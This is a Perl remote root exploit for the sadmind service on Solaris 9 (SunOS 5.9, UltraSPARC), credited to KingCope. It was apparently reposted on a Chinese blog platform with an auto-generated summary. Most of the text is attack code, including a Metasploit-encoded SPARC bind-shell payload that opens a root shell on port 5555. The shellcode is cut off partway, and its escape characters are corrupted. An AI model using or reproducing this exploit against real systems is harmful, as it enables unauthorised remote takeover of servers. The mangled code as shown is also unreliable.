#!/usr/bin/perl # holygrail2 # #---------------------------------------------------------------------------------# # SunOS 5.9 [UltraSPARC] sadmind Remote Root Exploit by KingCope in 2008 # # # # Most of work was shamelessy ripped from HD-Moore and RISE-Security exploits!!! # # Bug found by RISE-Security. # # Sparc exploit by KingCope [kcope2@googlemail.com] # # Maybe I will extend this to Solaris 8/10/11 in futura ?? # # thanks to alex,andi,adize ... # # # ################################################################################### use strict; use POSIX; use IO::Socket; use IO::Select; print "holygrail2 vs. SunOS 5.9 sadmind/nby kcope in 2008/nbinds a shell to port 5555/n"; my $host = $ARGV[0]; if ($host eq "") { print "usage: perl holygrail2.pl <address>/n"; exit(-1); } # solaris_sparc_bind - LPORT=5555 Size=232 Encoder=Sparc http://metasploit.com my $payload = "/x23/x32/xde/xd7/xa2/x14/x62/x6f/x20/xbf/xff/xff/x20/xbf/xff/xff". "/x7f/xff/xff/xff/xea/x03/xe0/x20/xaa/x9d/x40/x11/xea/x23/xe0/x20". "/xa2/x04/x40/x15/x81/xdb/xe0/x20/x12/xbf/xff/xfb/x9e/x03/xe0/x04". "/x57/x50/xfe/x68/xff/xb6/xde/x77/x69/xad/xde/x7c/x01/xcb/x1e/x89". "/xbb/xfc/xbe/x8f/x2b/xec/x9e/x8d/xce/x1c/xfe/x77/x5f/xcc/xdf/x7f". "/x8f/xce/xa0/x87/x11/x10/xdf/xf2/xf1/x04/xfe/x4f/x11/x06/xbe/x5f". "/x11/x6b/x7e/x6b/x03/x4f/x21/x83/xb7/x80/x01/xb3/x35/xb0/x61/x5b". "/xa8/x60/x42/x93/x1b/x83/x3d/x5b/x09/x94/x62/x9a/xaf/x84/x42/x75". "/x3e/x74/xa3/x8d/x91/x77/x1c/x75/x83/x62/x23/x8c/x37/x80/xe3/x87". "/xb5/xb4/xc3/x7d/x28/x65/x24/x89/x9b/xa6/x9b/x71/x8f/xb8/xc4/x82". "/x3d/xa9/x24/x8d/xd5/x6b/x84/x8c/x54/x7b/xe4/xb0/xc9/x
Solaris 9 [UltraSPARC] sadmind Remote Root Exploit
最新推荐文章于 2021-04-08 02:56:04 发布
这是一个由KingCope在2008年编写的针对SunOS 5.9 [UltraSPARC]的sadmind远程Root权限漏洞利用脚本。它从HD-Moore和RISE-Security的漏洞利用中获取灵感,通过Perl实现,能够绑定到端口5555,提供shell访问。该脚本可能在未来扩展以支持Solaris 8/10/11。
摘要由CSDN通过智能技术生成